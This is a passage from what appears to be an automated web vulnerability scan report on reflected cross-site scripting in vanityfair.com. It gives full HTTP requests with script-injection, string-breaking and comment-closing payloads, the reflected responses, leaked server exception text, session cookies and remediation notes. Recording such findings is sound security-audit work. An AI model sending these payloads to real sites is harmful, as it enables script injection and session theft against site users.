Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:39 GMT
Date: Mon, 29 Nov 2010 16:49:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/magazine/search?printable=true&c63ad"><script>alert(1)</script>d3d5348c07e=1" title="Print this page">
...[SNIP]...

1.158. http://www.vanityfair.com/magazine/toc/contents-201010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /magazine/toc/contents-201010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc72"><script>alert(1)</script>2302b52587 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /magazine/toc/contents-201010?1dc72"><script>alert(1)</script>2302b52587=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:36 GMT
Date: Mon, 29 Nov 2010 16:49:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/magazine/toc/contents-201010?printable=true&1dc72"><script>alert(1)</script>2302b52587=1" title="Print this page">
...[SNIP]...

1.159. http://www.vanityfair.com/magazine/toc/contents-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /magazine/toc/contents-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e583"><script>alert(1)</script>93660b63123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /magazine/toc/contents-201012?7e583"><script>alert(1)</script>93660b63123=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:54:37 GMT
Date: Mon, 29 Nov 2010 16:49:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106081


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/magazine/toc/contents-201012?printable=true&7e583"><script>alert(1)</script>93660b63123=1" title="Print this page">
...[SNIP]...

1.160. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-light-bright.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 499ce'%3b9cda7bf33ce was submitted in the REST URL parameter 3. This input was echoed as 499ce';9cda7bf33ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010499ce'%3b9cda7bf33ce/11/2010-gift-guide-light-bright.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:30 GMT
Date: Mon, 29 Nov 2010 16:48:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010499ce';9cda7bf33ce/11/2010-gift-guide-light-bright.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue
...[SNIP]...

1.161. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-light-bright.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 63ebc-->2091526e992 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/201063ebc-->2091526e992/11/2010-gift-guide-light-bright.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:32 GMT
Date: Mon, 29 Nov 2010 16:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47595


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[904528069]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/201063ebc-->2091526e992/11/2010-gift-guide-light-bright.html?proxyuri=online%2Fdaily%2F201063ebc--%3E2091526e992%2F11%2F2010-gift-guide-light-bright.html':
escaped absolute path not valid.
->
...[SNIP]...

1.162. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-light-bright.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload c1707-->0c1946b2f8f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11c1707-->0c1946b2f8f/2010-gift-guide-light-bright.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:57 GMT
Date: Mon, 29 Nov 2010 16:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
use bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1575394975]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11c1707-->0c1946b2f8f/2010-gift-guide-light-bright.html?proxyuri=online%2Fdaily%2F2010%2F11c1707--%3E0c1946b2f8f%2F2010-gift-guide-light-bright.html':
escaped absolute path not valid.
->
...[SNIP]...

1.163. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-light-bright.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5f22'%3bce033fecbd7 was submitted in the REST URL parameter 4. This input was echoed as c5f22';ce033fecbd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11c5f22'%3bce033fecbd7/2010-gift-guide-light-bright.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:54 GMT
Date: Mon, 29 Nov 2010 16:48:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11c5f22';ce033fecbd7/2010-gift-guide-light-bright.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue gl
...[SNIP]...

1.164. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-light-bright.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e23b'%3bc787839530b was submitted in the REST URL parameter 5. This input was echoed as 8e23b';c787839530b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11/2010-gift-guide-light-bright.html8e23b'%3bc787839530b HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:08 GMT
Date: Mon, 29 Nov 2010 16:49:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html8e23b';c787839530b',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.165. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-light-bright.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 8a32b-->0e45d1515ee was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11/2010-gift-guide-light-bright.html8a32b-->0e45d1515ee HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:09 GMT
Date: Mon, 29 Nov 2010 16:49:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47595


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
.exceptions.ApplicationBug:
-:[874406921]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html8a32b-->0e45d1515ee?proxyuri=online%2Fdaily%2F2010%2F11%2F2010-gift-guide-light-bright.html8a32b--%3E0e45d1515ee':
escaped absolute path not valid.
->
...[SNIP]...

1.166. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-original-keys.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload ee519-->9c2304aacae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010ee519-->9c2304aacae/11/2010-gift-guide-original-keys.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:42 GMT
Date: Mon, 29 Nov 2010 16:48:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[853185645]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010ee519-->9c2304aacae/11/2010-gift-guide-original-keys.html?proxyuri=online%2Fdaily%2F2010ee519--%3E9c2304aacae%2F11%2F2010-gift-guide-original-keys.html':
escaped absolute path not valid.
->
...[SNIP]...

1.167. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-original-keys.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc6d3'%3b61f82549449 was submitted in the REST URL parameter 3. This input was echoed as bc6d3';61f82549449 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010bc6d3'%3b61f82549449/11/2010-gift-guide-original-keys.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:39 GMT
Date: Mon, 29 Nov 2010 16:48:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010bc6d3';61f82549449/11/2010-gift-guide-original-keys.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogu
...[SNIP]...

1.168. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/2010-gift-guide-original-keys.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload c6935-->d45cae87ca0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

